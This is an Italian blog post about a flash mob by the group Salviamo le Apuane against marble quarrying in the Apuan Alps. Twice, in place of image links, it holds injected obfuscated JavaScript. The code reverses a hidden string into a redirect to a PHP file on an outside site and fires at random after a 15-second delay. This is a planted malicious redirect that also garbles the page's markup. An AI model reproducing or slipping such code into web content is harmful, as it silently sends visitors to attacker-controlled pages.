Una volta erano montagne… Magico flash mob di Salviamo le Apuane: spariti i blocchi!

image_pdfimage_print
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/10/flashmob2.jpg”>
la foto uscita su La Nazione

Il flash mob di ” quando i manifestanti si sono ritrovati al Piazzale Michelangelo con tanto di striscione, i blocchi di marmo della contestata “opera d’arte” erano già scomparsi! Senz’altro per paura…
In effetti il presidio, nato in poche ore di passaparola sui social network, si proponeva soprattutto di risvegliare l’attenzione sulla distruzione prodotta dal business del marmo in un ambiente unico e inestimabile come quello delle Alpi Apuane.

Distruzione ancor più inaccettabile perché condotta con mezzi sempre più devastanti, come gli esplosivi, e con scopi sempre meno nobili: si estrae marmo, e lo si polverizza, non certo per sculture o opere architettoniche ma per impiegarlo nell’industria chimica dei detergenti o dei cosmetici. Ecco perché la convocazione del flash mob circolata su web prendeva a simbolo un tubetto di dentifricio spremuto.

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/10/50265_126725830716674_3213598_s1.jpg”>

Salviamo le Apuane non è solo protesta, ma proposta: proposta di uno sviluppo diverso dell’economia della montagna, che recuperi l’agricoltura e il turismo, preservando il territorio e costruendo nuove possibilità di lavoro.

Per altre info Salviamo le Apuane è  su Facebook qui.

0 Comments

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *